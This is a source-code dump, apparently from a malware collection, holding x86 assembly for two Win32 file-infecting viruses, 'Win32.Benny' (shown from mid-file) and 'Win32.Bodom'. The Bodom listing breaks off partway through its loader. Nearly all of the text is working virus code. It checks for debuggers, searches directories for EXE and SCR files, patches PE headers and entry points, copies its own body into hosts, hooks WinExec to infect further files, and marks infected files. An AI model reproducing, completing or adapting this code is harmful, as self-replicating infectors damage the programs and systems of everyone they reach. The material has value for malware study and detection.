lea esi, [ebp + f_names]
GetAPIAddress:
call MyGetProcAddress
jecxz quit
xchg eax, ecx
stosd
@endsz
cmp byte ptr [esi], 0
jne GetAPIAddress
pushad ;now, we have all APIs, we can check
@SEH_SetupFrame ;for debugger
inc dword ptr gs:[edx] ;raise exception
;now, we continue at seh_fn label
seh_rs: lea esi, [ebp + PathName] ;debugger not present, continue
push esi
push esi
push 256
call [ebp + MyGetCurrentDirectoryA] ;get current directory
pop ebx
push 256
lea edi, [ebp + WindowsPath]
push edi
call [ebp + MyGetWindowsDirectoryA] ;get windows directory
Next_Char:
cmpsb ;compare directories
jmp_patch:
jne NoMatch ;this jump will be path in next check
jne Try_Process_Dir ;jump for next check fail
Matched_Char:
cmp byte ptr [esi - 1], 0 ;end of string ?
jne Next_Char
jmp quit
NoMatch: ;check for system directory
push 256
lea edi, [ebp + WindowsPath]
push edi
call [ebp + MyGetSystemDirectoryA]
mov word ptr [ebp + jmp_patch], 9090h ;patch jump
mov esi, ebx
jmp Next_Char
Try_Process_Dir:
call FindFirstFile ;we arnt in \windoze or \system dir, find file
inc eax ;success ?
je Try_Scr ;nope, try SCRs
dec eax
process_dir_check:
call CheckFileName ;check name
jnc Infect_File ;ok, infect file
call FindNextFile ;nope, find next file
test eax, eax
jne process_dir_check ;ok, check name
Try_Scr:
call FindClose ;find previous searchin
lea edx, [ebp + Win32_Find_Data]
push edx
lea edx, [ebp + vszScr]
push edx
call [ebp + MyFindFirstFileA] ;find first SCR
inc eax
je quit ;no files left, jump to host
dec eax
Infect_File:
;Check size
xor ecx, ecx
lea ebx, [ebp + Win32_Find_Data]
test byte ptr [ebx], FILE_ATTRIBUTE_DIRECTORY
jne end_size_check ;discard directories
cmp [ebx.WFD_nFileSizeHigh], ecx ;discard huge files
jne end_size_check
mov edi, [ebx.WFD_nFileSizeLow]
lea esi, [ebx.WFD_szFileName]
cmp edi, 16 * 1024 ;discard small files
jb end_size_check
cmp edi, 64000 * 1024
jg end_size_check ;discard huge files
push ecx ;blank file attributez
push esi
call [ebp + MySetFileAttributesA]
test eax, eax
je end_size_check
push edi ;open and map file
sub edi, Start_Virus - Virtual_End
call Open&MapFile
pop edi
test ecx, ecx
je end_SetFileAttributez
cmp word ptr [ecx], 'ZM' ;Check PE-header
jne Close&UnmapFile
xchg eax, edx
mov edx, [ecx.MZ_lfanew]
cmp eax, edx
jb CloseFile
add edx, ecx
cmp dword ptr [edx], 'EP'
jne CloseFile
movzx eax, word ptr [edx.NT_FileHeader.FH_Machine]
cmp ax, 14ch ;must be 386+
jne CloseFile
mov ebx, ecx
movzx ecx, word ptr [edx.NT_FileHeader.FH_NumberOfSections]
cmp ecx, 3
jb CloseFile ;at least 3 sections
mov ax, word ptr [edx.NT_FileHeader.FH_Characteristics]
not al
test ax, 2002h ;executable, but not DLL
jne CloseFile
cmp dword ptr [edx.NT_OptionalHeader.OH_ImageBase], 64*65536 ;image base only 400000h
jne CloseFile
lea eax, [ebp + vszGetModuleHandleA]
mov ecx, ebx
lea edx, [ebp + vszKernel32]
call GetProcAddressIT ;find GetModuleHandleA API entry
test eax, eax
je CloseFile
lea edx, [ebp + MyGetModuleHandleA]
sub eax, -400000h
mov [edx], eax ;save that entry
pushad ;load 64bit checksum
push ebx
mov esi, ebx
sub esi, -MZ_res2
lodsd
mov ebx, eax
lodsd
mov edi, eax
pop esi
push esi
push ebp
mov eax, [ebp + Win32_Find_Data.WFD_nFileSizeLow]
sub esi, -MZ_res2 - 8
mov ebp, 8
cdq
div ebp
cdq
mul ebp
pop ebp
mov ecx, eax
call Checksum64 ;generate new 64bit checksum
pop esi ;and compare checksums
cmp ebx, edx
jne n_Infect
cmp edi, eax
je CloseFile
n_Infect:
popad
push ecx
push ecx
mov edx, [ecx.MZ_lfanew]
add edx, ecx
movzx esi, word ptr [edx.NT_FileHeader.FH_SizeOfOptionalHeader]
lea esi, [edx.NT_OptionalHeader + esi] ;locate first section
movzx ecx, word ptr [edx.NT_FileHeader.FH_NumberOfSections] ;get number of sctnz
mov edi, esi ;get LAST section
xor eax, eax
push ecx
BSection:
cmp [edi.SH_PointerToRawData], eax
je NBiggest
mov ebx, ecx
mov eax, [edi.SH_PointerToRawData]
NBiggest:
sub edi, -IMAGE_SIZEOF_SECTION_HEADER
loop BSection
pop ecx
sub ecx, ebx
push edx
imul eax, ecx, IMAGE_SIZEOF_SECTION_HEADER
pop edx
add esi, eax
mov edi, dword ptr [esi.SH_SizeOfRawData]
mov eax, Virtual_End - Start_Virus
push edi
lea edi, [esi.SH_VirtualSize] ;new virtual size of section
push dword ptr [edi]
add [edi], eax
mov eax, [edi]
push edx
mov ecx, [edx.NT_OptionalHeader.OH_FileAlignment]
xor edx, edx
div ecx
xor edx, edx
inc eax
mul ecx
mov [esi.SH_SizeOfRawData], eax ;new SizeOfRawData (aligned virtual size)
mov ecx, eax
pop edx
pop ebx
add ebx, [esi.SH_VirtualAddress]
mov eax, [edx.NT_OptionalHeader.OH_AddressOfEntryPoint]
pop edi
push eax
mov eax, [ebp + OrigEPoint]
pop [ebp + OrigEPoint]
mov [edx.NT_OptionalHeader.OH_AddressOfEntryPoint], ebx
sub ecx, edi
add [edx.NT_OptionalHeader.OH_SizeOfImage], ecx ;new SizeOfImage
or byte ptr [esi.SH_Characteristics.hiw.hib], 0e0h ;change flags
pop edi
add edi, [esi.SH_PointerToRawData]
add edi, [esi.SH_VirtualSize]
add edi, Start_Virus - Virtual_End
lea esi, [ebp + Start_Virus]
mov ecx, (Virus_End - Start_Virus + 3) / 4
rep movsd ;copy virus
mov [ebp + OrigEPoint], eax ;restore variable after copy stage
jmp CloseFileOK
CloseFile:
call Close&UnmapFile ;unmap view of file
jmp end_SetFileAttributez ;and restore attributes
CloseFileOK:
pop esi
push esi
push ebx
push ebp
mov ebp, 8
mov ebx, MZ_res2 + 8
add esi, ebx
mov ecx, ebp
mov eax, edi
add eax, ebx
sub eax, esi
cdq
div ecx
cdq
imul ecx, eax, 8
call Checksum64 ;generate new 64bit checksum as "already infected" mark
sub esi, ebp
mov [esi], edx ;store it to MZ.MZ_res2 field
mov [esi+4], eax
pop ebp
pop ebx
pop esi
sub edi, esi
mov [ebp + Win32_Find_Data.WFD_nFileSizeLow], edi ;correct file size for unmapping
call Close&UnmapFile ;unmap view of file
end_SetFileAttributez:
push dword ptr [ebp + Win32_Find_Data] ;restore attributes
push esi
call [ebp + MySetFileAttributesA]
end_size_check:
call FindNextFile ;find next file
test eax, eax
jne next_file ;weve got one, check that
call FindClose ;nope, close search handle
jmp quit ;and jump to host
next_file:
call CheckFileName ;check file name
jnc Infect_File ;ok, infect it
jmp end_size_check ;nope, try next file
CheckFileName proc ;check file name
lea edi, [ebp + Win32_Find_Data.WFD_szFileName]
lea esi, [ebp + vszNamez]
mov ecx, vszNumberOfNamez
mov edx, edi
Ext_Next_Char:
@endsz
mov edi, edx
Ext_Next_Char2:
cmpsb
je Ext_Matched_Char
inc eax
loop Ext_Next_Char
clc
ret
Ext_Matched_Char:
cmp byte ptr [esi - 1], 0
jne Ext_Next_Char2
stc
end_Ext_Checking:
ret
CheckFileName EndP
FindFirstFile proc ;find first file procedure
lea edx, [ebp + Win32_Find_Data]
push edx
lea edx, [ebp + vszExe]
push edx
call [ebp + MyFindFirstFileA]
mov [ebp + SearchHandle], eax
ret
FindFirstFile EndP
FindNextFile proc ;find next file procedure
lea edx, [ebp + Win32_Find_Data]
push edx
push dword ptr [ebp + SearchHandle]
call [ebp + MyFindNextFileA]
ret
FindNextFile EndP
FindClose proc ;find close procedure
push dword ptr [ebp + SearchHandle]
call [ebp + MyFindClose]
ret
FindClose EndP
Open&MapFile proc ;open and map file procedure
xor eax, eax
push eax ;NULL
push eax ;FILE_ATTRIBUTE_NORMAL
push 3 ;OPEN_EXISTING
push eax ;NULL
push 1 ;FILE_SHARE_READ
push 0c0000000h ;GENERIC_READ | GENERIC_WRITE
push esi ;pszFileName
call [ebp + MyCreateFileA] ;open
cdq
inc eax
je end_Open&MapFile
dec eax
mov [ebp + hFile], eax
push edx ;NULL
push edi ;file size
push edx ;0
push 4 ;PAGE_READWRITE
push edx ;NULL
push eax ;handle
call [ebp + MyCreateFileMappingA] ;create mapping object
cdq
xchg ecx, eax
jecxz end_Open&MapFile2
mov [ebp + hMapFile], ecx
push edx ;0
push edx ;0
push edx ;0
push 2 ;FILE_MAP_WRITE
push ecx ;handle
call [ebp + MyMapViewOfFile] ;map file to address space of app
mov ecx, eax
jecxz end_Open&MapFile3
mov [ebp + lpFile], ecx
end_Open&MapFile:
mov ecx, eax
ret
Open&MapFile EndP
Close&UnmapFile proc ;close and unmap file procedure
push dword ptr [ebp + lpFile]
call [ebp + MyUnmapViewOfFile] ;unmap file
end_Open&MapFile3:
push dword ptr [ebp + hMapFile]
call [ebp + MyCloseHandle] ;close mapping object
end_Open&MapFile2:
mov ebx, [ebp + hFile]
cdq ;xor edx, edx
push edx ;FILE_BEGIN
push edx ;0 - high offset
push dword ptr [ebp + Win32_Find_Data.WFD_nFileSizeLow]
push ebx
call [ebp + MySetFilePointer]
push ebx
call [ebp + MySetEndOfFile] ;truncate file
lea edx, [ebp + Win32_Find_Data.WFD_ftLastWriteTime]
push edx
lea edx, [ebp + Win32_Find_Data.WFD_ftLastAccessTime]
push edx
lea edx, [ebp + Win32_Find_Data.WFD_ftCreationTime]
push edx
push ebx
call [ebp + MySetFileTime] ;restore time
push ebx
call [ebp + MyCloseHandle] ;and finally close file
ret
Close&UnmapFile EndP
;procedure for exploring modules export table
MyGetProcAddress proc ;input:
;ebx - module address
;esi - pointer to API name
;output:
;ecx - address of GetProcAddress at memory
push ebx
push edi
push esi
push ebp
@SEH_SetupFrame
mov eax, ebx
add eax, [eax.MZ_lfanew]
mov ecx, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_Size]
jecxz Proc_Address_not_found
mov ebp, ebx
add ebp, [eax.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
push ecx
mov edx, ebx
add edx, [ebp.ED_AddressOfNames]
mov ecx, [ebp.ED_NumberOfNames]
xor eax, eax
Search_for_API_name:
mov edi, [esp + 16]
mov esi, ebx
add esi, [edx + eax * 4]
Next_Char_in_API_name:
cmpsb
jz Matched_char_in_API_name
inc eax
loop Search_for_API_name
pop eax
Proc_Address_not_found:
xor eax, eax
jmp End_MyGetProcAddress
Matched_char_in_API_name:
cmp byte ptr [esi-1], 0
jne Next_Char_in_API_name
pop ecx
mov edx, ebx
add edx, [ebp.ED_AddressOfOrdinals]
movzx eax, word ptr [edx + eax * 2]
Check_Index:
cmp eax, [ebp.ED_NumberOfFunctions]
jae Proc_Address_not_found
mov edx, ebx
add edx, [ebp.ED_AddressOfFunctions]
add ebx, [edx + eax * 4]
mov eax, ebx
sub ebx, ebp
cmp ebx, ecx
jb Proc_Address_not_found
End_MyGetProcAddress:
@SEH_RemoveFrame
xchg eax, ecx
pop ebp
pop esi
pop edi
pop ebx
ret
MyGetProcAddress endp
;all beginners=> im so sorry, but I didnt have any time to comment this stuff.
GetProcAddressIT proc ;input:
;EAX - API name
;ECX - lptr to PE header
;EDX - module name
;output:
;EAX - RVA pointer to IAT, 0 if error
pushad
xor eax, eax
push ebp
mov ebp, ecx
lea esi, [ecx.MZ_lfanew]
add ebp, [esi]
mov esi, ebp
;RVA of Import table
mov eax, [esi.NT_OptionalHeader.OH_DirectoryEntries.DE_Import.DD_VirtualAddress]
mov ebp, ecx
push ecx
movzx ecx, word ptr [esi.NT_FileHeader.FH_NumberOfSections]
movzx ebx, word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
lea ebx, [esi.NT_OptionalHeader + ebx]
scan_sections:
mov edx, [ebx.SH_VirtualAddress]
cmp edx, eax
je section_found
sub ebx, -IMAGE_SIZEOF_SECTION_HEADER
loop scan_sections
pop ecx
pop eax
jmp End_GetProcAddressIT2
section_found:
mov ebx, [ebx + 20]
add ebx, ebp
pop ecx
pop eax
test ebx, ebx
je End_GetProcAddressIT2
xor esi, esi
xor ebp, ebp
push esi
dec ebp
Get_DLL_Name:
pop esi
inc ebp
mov edi, [esp + 20]
mov ecx, [ebx.esi.ID_Name] ;Name RVA
test ecx, ecx
je End_GetProcAddressIT2
sub ecx, edx
sub esi, -IMAGE_SIZEOF_IMPORT_DESCRIPTOR
push esi
lea esi, [ebx + ecx]
Next_Char_from_DLL:
lodsb
add al, -'.'
jz IT_nup
sub al, -'.' + 'a'
cmp al, 'z' - 'a' + 1
jae no_up
add al, -20h
no_up: sub al, -'a'
IT_nup: scasb
jne Get_DLL_Name
cmp byte ptr [edi-1], 0
jne Next_Char_from_DLL
Found_DLL_Name:
pop esi
imul eax, ebp, IMAGE_SIZEOF_IMPORT_DESCRIPTOR
mov ecx, [ebx + eax.ID_OriginalFirstThunk]
jecxz End_GetProcAddressIT2
sub ecx, edx
add ecx, ebx
xor esi, esi
Next_Imported_Name:
push esi
mov edi, [esp + 32]
mov esi, [ecx + esi]
test esi, esi
je End_GetProcAddressIT3
sub esi, edx
add esi, ebx
lodsw
next_char:
cmpsb
jne next_step
cmp byte ptr [esi-1], 0
je got_it
jmp next_char
next_step:
pop esi
sub esi, -4
jmp Next_Imported_Name
got_it: pop esi
imul ebp, IMAGE_SIZEOF_IMPORT_DESCRIPTOR
add ebx, ebp
mov eax, [ebx.ID_FirstThunk]
add eax, esi
mov [esp + 28], eax
jmp End_GetProcAddressIT
End_GetProcAddressIT3:
pop eax
End_GetProcAddressIT2:
xor eax, eax
mov [esp.Pushad_eax], eax
End_GetProcAddressIT:
popad
ret
GetProcAddressIT EndP
Checksum64 proc ;output:
; EDX:EAX - 64-bit checksum
push ebx ;save regs
push ecx
push edi
push esi
xor eax, eax ;nulify eax
cdq ;nulify edx
make_crc:
call crc_byte ;read 8 bytes
adc eax, ebx ;add LSD + CF to LSD
jnc @1
not eax ;invert LSD
@1: xor eax, edx ;rotate LSD LSB times
jp @2
call crc_rotate ;rotate LSD and MSD
@2: js crc_msd
sbb eax, edx ;sub LSD with MSD + CF
crc_msd:sbb edx, edi ;sub MSD with MSD + CF
jnp @3
not edx ;invert MSD
@3: xor edx, eax ;xor MSD with LSD
jns @4
call crc_rotate ;rotate LSD and MSD
@4: jc crc_loop
adc edx, eax ;add LSD to MSD + CF
crc_loop:
jp next_loop
call crc_swap ;swap bytes in LSD and MSD
next_loop:
dec eax ;decrement LSD
inc edx ;increment MSD
loop make_crc ;until ecx = 1
pop esi ;restore regs
pop edi
pop ecx
pop ebx
ret
crc_byte: ;read 8 bytes from source
push eax
lodsd ;load 4 bytes
mov ebx, eax ;ebx = new 4 bytes
lodsd ;load next 4 bytes
mov edi, eax ;edi = new 4 bytes
pop eax
add ecx, -7 ;correct ecx for loop
ret
crc_rotate: ;rotate LSD and MSD
push ecx
push edi
xor edi, eax ;xor MSD with LSD
mov ecx, edi ;count of rotations
pop edi
rcr eax, cl ;rotate LSD
push ebx
xor ebx, edx ;xor LSD with MSD
mov ecx, ebx ;count of rotations
pop ebx
rcl edx, cl ;rotate MSD
pop ecx
ret
crc_swap: ;swap bytes in LSD and MSD
xchg al, dh ;swap LSD and MSD lower bytes
xchg ah, dl ; ...
rol eax, 16 ;get highest bytes
rol edx, 16 ; ...
xchg al, dh ;swap LSD and MSD higher bytes
xchg ah, dl ; ...
xchg eax, edx ;and swap LSD with MSD
ret
db 'Win32.Benny (c) 1999 by Benny', 0 ;my mark
Checksum64 EndP
OrigEPoint dd offset host - 400000h
MyGetModuleHandleA dd offset _GetModuleHandleA
Virus_End:
MyGetVersion dd ?
MyIsDebuggerPresent dd ?
MyCreateFileA dd ?
MyFindFirstFileA dd ?
MyFindNextFileA dd ?
MyFindClose dd ?
MySetFileAttributesA dd ?
MyCloseHandle dd ?
MyCreateFileMappingA dd ?
MyMapViewOfFile dd ?
MyUnmapViewOfFile dd ?
MySetFilePointer dd ?
MySetEndOfFile dd ?
MySetFileTime dd ?
MyGetWindowsDirectoryA dd ?
MyGetSystemDirectoryA dd ?
MyGetCurrentDirectoryA dd ?
v_strings:
vszKernel32 db 'KERNEL32', 0
vszGetModuleHandleA db 'GetModuleHandleA', 0
f_names:
vszGetVersion db 'GetVersion', 0
vszIsDebuggerPresent db 'IsDebuggerPresent', 0
vszCreateFileA db 'CreateFileA', 0
vszFindFirstFileA db 'FindFirstFileA', 0
vszFindNextFileA db 'FindNextFileA', 0
vszFindClose db 'FindClose', 0
vszSetFileAttributesA db 'SetFileAttributesA', 0
vszCloseHandle db 'CloseHandle', 0
vszCreateFileMappingA db 'CreateFileMappingA', 0
vszMapViewOfFile db 'MapViewOfFile', 0
vszUnmapViewOfFile db 'UnmapViewOfFile', 0
vszSetFilePointer db 'SetFilePointer', 0
vszSetEndOfFile db 'SetEndOfFile', 0
vszSetFileTime db 'SetFileTime', 0
vszGetWindowsDirectoryA db 'GetWindowsDirectoryA', 0
vszGetSystemDirectoryA db 'GetSystemDirectoryA', 0
vszGetCurrentDirectoryA db 'GetCurrentDirectoryA', 0, 0
vszExe db '*.EXE', 0
vszScr db '*.SCR', 0
vszNamez db 'NTVDM.EXE', 0
db 'RUNDLL32.EXE', 0
db 'TD32.EXE', 0
db 'TLINK32.EXE', 0
db 'TASM32.EXE', 0
PathName db 256 dup (?)
WindowsPath db 256 dup (?)
Win32_Find_Data WIN32_FIND_DATA ?
SearchHandle dd ?
hFile dd ?
hMapFile dd ?
lpFile dd ?
Virtual_End:
_GetModuleHandleA dd offset GetModuleHandleA
host: push 1000h
push offset Msg
push offset Msg
push 0
call MessageBoxA
exit_h: push 0
call ExitProcess
Msg db 'First generation of Win32.Benny', 0
ends
End Start_Virus
Win32/Infector/Win32.Bodom.asm
+561
View File
@@ -0,0 +1,561 @@
; Win32.Bodom by DR-EF (c) 2004
; -----------------------------
;Author:DR-EF
;Type:Per Process Resident/Direct Action PE infector
;Size:about 1700 bytes
;Features:
;---------
; 1)virus body is placed between the end of
; headers and the first section body,so
; it dont increase file size
; 2)E.P.O - virus dont modifly entry point
; instead it overwrite the host entry
; point with code that jump to loader
; 3)dont change section flags,instead it
; place loader at the aligned space of the
; code section,this loader allocate memory
; and copy the virus body to there,and run
; it from the allocated memory
; 4)Per Process residenty - the virus hook the
; WinExec api,and infect files when this api
; is called,it infect the currect directory
; as well
;
;
; DR-EF.
extrn ExitProcess:proc
.586
.model flat
DEBUG equ 0
VirusSize equ (VirusEnd-VirusStart)
.data
db ?
.code
_main:
;first generation init code:
mov eax,VirusSize
mov ebx,SizeOfLoaderCode
xor ebp,ebp
mov dword ptr [ebp + HostEntryPoint_of],offset Exit
mov edi,offset HostEntryPointBytes
mov esi,offset Exit
mov ecx,SizeOfJumpCode
rep movsb
VirusStart equ $
call Delta
Delta: pop ebp
sub ebp,offset Delta
mov eax,dword ptr [esp]
xor ax,ax
mov ebx,eax
@NextP: cmp word ptr [eax],"ZM" ;check mz sign
jne MoveNP
mov ebx,eax
add eax,[eax + 3ch]
cmp word ptr [eax],"EP" ;check pe sign
je kernelF
MoveNP: xchg eax,ebx
sub eax,1000h
jmp @NextP ;move to next page
kernelF:xchg eax,ebx
push eax
SearchGetProcAddress:
add eax,[eax + 3ch]
mov eax,[eax + 78h]
add eax,[esp]
push eax ;eax - kernel32 export table
xor edx,edx
mov eax,[eax + 20h]
add eax,[esp + 4h]
mov edi,[eax]
add edi,[esp + 4h] ;edi - api names array
dec edi
nxt_cmp:inc edi
lea esi,[ebp + _GetProcAddress]
mov ecx,0eh
rep cmpsb
je search_address
inc edx
nxt_l: cmp byte ptr [edi],0h
je nxt_cmp
inc edi
jmp nxt_l
search_address:
pop eax ;eax - kernel32 export table
shl edx,1h ;edx - GetProcAddress position
mov ebx,[eax + 24h]
add ebx,[esp]
add ebx,edx
mov dx,word ptr [ebx]
shl edx,2h
mov ebx,[eax + 1ch]
add ebx,[esp]
add ebx,edx
mov ebx,[ebx]
add ebx,[esp]
mov [ebp + __GetProcAddress],ebx
mov ecx,NumberOfApis ;ecx - number of apis
lea eax,[ebp + ApiNamesTable] ;eax - address to api strings
lea ebx,[ebp + ApiAddressTable] ;ebx - address to api address
pop edx ;edx - module handle
NextAPI:push ecx
push edx
push eax
push eax
push edx
call [ebp + __GetProcAddress]
mov dword ptr [ebx],eax
pop eax
NextSTR:inc eax
cmp byte ptr [eax],0h
jne NextSTR
inc eax
add ebx,4h
pop edx
pop ecx
loop NextAPI
lea eax,[ebp + WIN32_FIND_DATA]
push eax
call _FindF
db "*.exe",0
_FindF: call [ebp + FindFirstFile]
cmp eax,INVALID_HANDLE_VALUE
je Hook
mov [ebp + hfind],eax
@Find: lea ebx,[ebp + cFileName]
call InfectFile
lea eax,[ebp + WIN32_FIND_DATA]
push eax
push dword ptr [ebp + hfind]
call [ebp + FindNextFile]
or eax,eax
jnz @Find
Hook: ;hook the WinExec api
mov eax,400000h ;host image base
HostImageBase equ ($-VirusStart-4)
lea ebx,[ebp + dll]
lea ecx,[ebp + fn]
lea edx,[ebp + WinExecHook]
call HookApi
mov [ebp + WinExec_],eax
ReturnToHost:
mov edi,12345678h
HostEntryPoint_of equ ($-4)
HostEntryPoint_ equ ($-VirusStart-4)
push edi
call dummy
HostEntryPoint dd 0
dummy: push PAGE_EXECUTE_READWRITE
push 1000h
push edi
call [ebp + VirtualProtect]
mov ecx,SizeOfJumpCode
lea esi,[ebp + HostEntryPointBytes]
rep movsb
ret
db "[Win32.Bodom] Written By DR-EF (c) 2004"
;input:
;eax - image base
;ebx - dll name
;ecx - function name
;edx - hook procedure
;output
;eax - new function address or 0 if fail
HookApi:
cmp word ptr [eax],"ZM" ;check mz sign
jne HookErr
push eax ;save image base in the stack
add eax,[eax + 3ch] ;goto pe header
add eax,80h
mov eax,[eax] ;get import section rva
cmp eax,0h
je HookErr_
add eax,[esp] ;convert it to va
@Dll: mov esi,[eax + 0ch]
cmp esi,0h
je HookErr_
add esi,[esp] ;esi - dll name
;compare the dll name in [esi],with our dll:
pushad
xchg edi,ebx
xor ecx,ecx
@Gsize: cmp byte ptr [edi+ecx],0h ;get our dll size
je _Size
inc ecx
jmp @Gsize
_Size: rep cmpsb
je _dll
popad
add eax,14h ;move to next IMAGE_IMPORT_DESCRIPTOR structure
jmp @Dll
_dll: popad
;edx - Hook procedure
;ecx - function to hook
;eax - IMAGE_IMPORT_DESCRIPTOR of our api dll
;[esp] - image base
mov ebx,[eax] ;get rva to pointers to image import by name structures
add ebx,[esp] ;convert it to va
xor edi,edi ;used to save loop index
@FindApi:
;ebx - pointer to pointers arrary of import by name structures
push edi ;save loop index
push ebx ;save pointer to import by name structures
push eax ;save import section rva
push ecx ;save function to hook name
push edx ;save hook procedure
;--------------------------------------------------------------------
mov esi,[ebx] ;get import by name structure rva
add esi,[esp + 14h] ;convert it to va
add esi,2h ;skip the IBN_Hint
;compare api string with our api name:
mov edi,ecx ;move our api name into edi
xor ecx,ecx ;used to save our api name size
@GSize_:cmp byte ptr [edi + ecx],0h ;did we in the end ?
je ___Size
inc ecx
jmp @GSize_
___Size:inc ecx ;include the 0
rep cmpsb ;compare api names
je ApiFound ;we found it !
;--------------------------------------------------------------------
;restore everthing
pop edx
pop ecx
pop eax
pop ebx
pop edi
add edi,4h
add ebx,4h ;move to next pointer
cmp dword ptr [ebx],0h ;no more pointers ???
jne @FindApi
HookErr_:
pop eax
HookErr:xor eax,eax
ret
ApiFound:
pop edx
pop ecx
pop eax
pop ebx
pop edi
mov esi,[eax + 10h] ;rva to name
add esi,[esp]
add esi,edi ;goto our api address
mov eax,[esi] ;get our api old address
mov [esi],edx ;hook it !
pop esi ;restore stack
ret
WinExecHook:
IF DEBUG
int 3
ENDIF
pushad
pushfd
call HookD
HookD: pop ebp
sub ebp,offset HookD
mov ebx,[esp + 28h]
call InfectFile
popfd
popad
push ebp
call Hook_D
Hook_D: pop ebp
sub ebp,offset Hook_D
xchg eax,ebp
pop ebp
jmp dword ptr [eax + WinExec_]
WinExec_ dd 0
dll db "KERNEL32.dll",0
fn db "WinExec",0
hfind dd 0
INVALID_HANDLE_VALUE equ -1
WIN32_FIND_DATA:
dwFileAttributes dd 0
ftCreationTime dq 0
ftLastAccessTime dq 0
ftLastWriteTime dq 0
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0
dwReserved1 dd 0
cFileName db 0ffh dup (0)
cAlternateFileName db 14h dup (0)
;ebx - file name
InfectFile:
xor eax,eax
push eax
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push ebx
call [ebp + CreateFile]
inc eax
je ExitInfect
dec eax
mov dword ptr [ebp + hfile],eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READWRITE
push eax
push dword ptr [ebp + hfile]
call [ebp + CreateFileMapping]
or eax,eax
je ExitCloseFile
mov dword ptr [ebp + hmap],eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_WRITE
push dword ptr [ebp + hmap]
call [ebp + MapViewOfFile]
or eax,eax
je ExitCloseMap
mov dword ptr [ebp + mapbase],eax
cmp word ptr [eax],"ZM" ;check mz sign
jne ExitUnmap
add eax,[eax + 3ch]
cmp word ptr [eax],"EP" ;check pe sign
jne ExitUnmap
cmp byte ptr [eax + 0bh],29h ;check if already infected
je ExitUnmap
push eax ;save pe header offset in the stack
xor ecx,ecx
mov cx,[eax + 6h] ;get number of sections
mov ebx,[eax + 34h] ;get image base
mov dword ptr [ebp + VirusEntryPoint],ebx
mov dword ptr [ebp + LoaderEntryPoint],ebx
mov dword ptr [ebp + HostEntryPoint],ebx
mov ebx,[eax + 28h]
add dword ptr [ebp + HostEntryPoint],ebx
mov ebx,[eax + 74h]
shl ebx,3h
add eax,ebx
add eax,78h ;eax -first section header
mov ebx,[eax + 0ch] ;get virtual address
cmp ebx,[eax + 14h]
jne Exit__ ;dont infect file
push eax
@GetLS: add eax,28h
loop @GetLS
sub eax,[ebp + mapbase] ;get end of headers(pe & sections),in file
pop ebx
mov ecx,[ebx + 14h] ;get pointer to raw data of the first section
sub ecx,eax
cmp ecx,VirusSize ;there enough space ?
jb Exit__
mov edi,eax
add edi,[ebp + mapbase]
push edi
push edi
sub edi,[ebp + mapbase]
add dword ptr [ebp + VirusEntryPoint],edi ;save virus entry point
mov edx,[esp] ;get pe header offset
mov eax,[ebx + 10h] ;get size of raw data
sub eax,[ebx + 8h] ;get aligned space size
cmp eax,SizeOfLoaderCode
jb Exit__
mov edi,[ebx + 14h] ;get pointer to raw data
add edi,[ebx + 8h] ;goto alinged space
add dword ptr [ebp + LoaderEntryPoint],edi
add edi,[ebp + mapbase]
lea esi,[ebp + Loader_Code]
mov ecx,SizeOfLoaderCode
rep movsb ;copy the loader into the host
lea edi,[ebp + JumpCode]
xor ecx,ecx
mov cx,word ptr [ebp + push_and_ret+4]
mov byte ptr [edi],68h
mov dword ptr [edi + 1h],ecx
add edi,5h
mov ecx,dword ptr [ebp + push_and_ret]
mov byte ptr [edi],68h
mov dword ptr [edi +1h],ecx
pop edi
push edi
lea esi,[ebp + VirusStart]
mov ecx,VirusSize
rep movsb ;copy the virus into host
;patch the return to host address
pop edi
push dword ptr [ebp + HostEntryPoint]
pop dword ptr [edi + HostEntryPoint_]
mov esi,dword ptr [esp + 4h] ;get pe header
push dword ptr [esi + 34h] ;push image base
pop dword ptr [edi + HostImageBase] ;save image base in the virus body
mov esi,dword ptr [esi + 28h] ;get entry point
add esi,[ebp + mapbase]
pop edi
push esi
add edi,(HostEntryPointBytes - VirusStart)
mov ecx,SizeOfJumpCode
rep movsb ;save host entry point bytes
pop edi
lea esi,[ebp + JumpCode]
mov ecx,SizeOfJumpCode
rep movsb ;overwrite host entry point with jumper code
Exit__: pop eax ;restore pe header
mov byte ptr [eax + 0bh],29h ;sign the file as infected
ExitUnmap:
push dword ptr [ebp + mapbase]
call [ebp + UnmapViewOfFile]
ExitCloseMap:
push dword ptr [ebp + hmap]
call [ebp + CloseHandle]
ExitCloseFile:
push dword ptr [ebp + hfile]
call [ebp + CloseHandle]
ExitInfect:
ret
hfile dd 0
hmap dd 0
mapbase dd 0
push_and_ret:
db 68h
LoaderEntryPoint dd 0
db 0c3h
JumpCode:
db 0ah dup (0)
push esp
xor eax,eax
push dword ptr fs:[eax]
mov fs:[eax],esp
mov dword ptr [eax],eax
SizeOfJumpCode equ ($-JumpCode)
HostEntryPointBytes db SizeOfJumpCode dup(0)
PAGE_EXECUTE_READWRITE equ 40h
FILE_ATTRIBUTE_NORMAL equ 00000080h
FILE_MAP_READ equ 00000004h
OPEN_EXISTING equ 3
FILE_SHARE_READ equ 00000001h
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
PAGE_READWRITE equ 4h
FILE_MAP_WRITE equ 00000002h
Loader_Code:
;find VirtualAlloc api,allocate memory,copy virus into memory & run it
mov esp,[esp + 8h]
pop dword ptr fs:[0]
add esp,0ch
mov eax,dword ptr [esp] ;get return address
xor ax,ax
@Find_: cmp word ptr [eax],"ZM"
je ___1
sub eax,1000h
jmp @Find_
___1: push eax ;eax - kernel base address
add eax,[eax + 3ch]
mov eax,[eax + 78h]
add eax,[esp]
push eax ;eax - kernel32 export table
xor edx,edx
mov eax,[eax + 20h]
add eax,[esp+4h]
mov edi,[eax]
add edi,[esp+4h] ;edi - api names array
dec edi
NxtCmp: inc edi
call OverVA
db "VirtualAlloc",0
OverVA: pop esi
mov ecx,0ch
rep cmpsb
je FindAdd
inc edx
NXT: cmp byte ptr [edi],0h
je NxtCmp
inc edi
jmp NXT
FindAdd:pop eax ;eax - kernel32 export table
shl edx,1h ;edx - GetProcAddress position
mov ebx,[eax + 24h]
